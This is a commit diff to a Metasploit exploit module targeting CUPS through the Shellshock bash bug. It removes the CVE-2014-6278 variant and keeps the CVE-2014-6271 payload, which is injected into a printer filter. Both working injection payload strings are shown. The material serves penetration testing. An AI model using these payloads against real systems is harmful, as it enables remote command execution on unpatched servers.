Remove CVE-2014-6278

2014-10-28 16:18:24 +00:00 · 2014-10-28 16:18:24 +00:00 · 78b199fe72
parent a060fec760
commit 78b199fe72
1 changed files with 1 additions and 18 deletions
--- a/modules/exploits/multi/http/cups_bash_env_exec.rb
+++ b/modules/exploits/multi/http/cups_bash_env_exec.rb
@ -19,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
-        'lcamtuf', # CVE-2014-6278
        'Brendan Coles <bcoles[at]gmail.com>' # msf
      ],
      'References' => [
@ -54,7 +53,6 @@ class Metasploit4 < Msf::Exploit::Remote
      OptBool.new('SSL', [ true, 'Use SSL', true ]),
      OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
      OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
-      OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
      OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
    ], self.class)
  end
@ -66,13 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote
    %{() { :;}; $(#{cmd}) & }
  end

-  #
-  # CVE-2014-6278
-  #
-  def cve_2014_6278(cmd)
-    %{() { _; } >_[$($())] { $(#{cmd}) & }}
-  end
-
  #
  # Check credentials
  #
@ -107,17 +98,9 @@ class Metasploit4 < Msf::Exploit::Remote
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))

-    # Select target CVE
-    case datastore['CVE']
-    when 'CVE-2014-6278'
-      cmd = cve_2014_6278(payload.raw)
-    else
-      cmd = cve_2014_6271(payload.raw)
-    end
-
    # Add a printer containing the payload
    # with a CUPS filter pointing to /bin/bash
-    res = add_printer(printer_name, cmd)
+    res = add_printer(printer_name, cve_2014_6271(payload.raw))
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
    elsif res.body =~ /Set Default Options for #{printer_name}/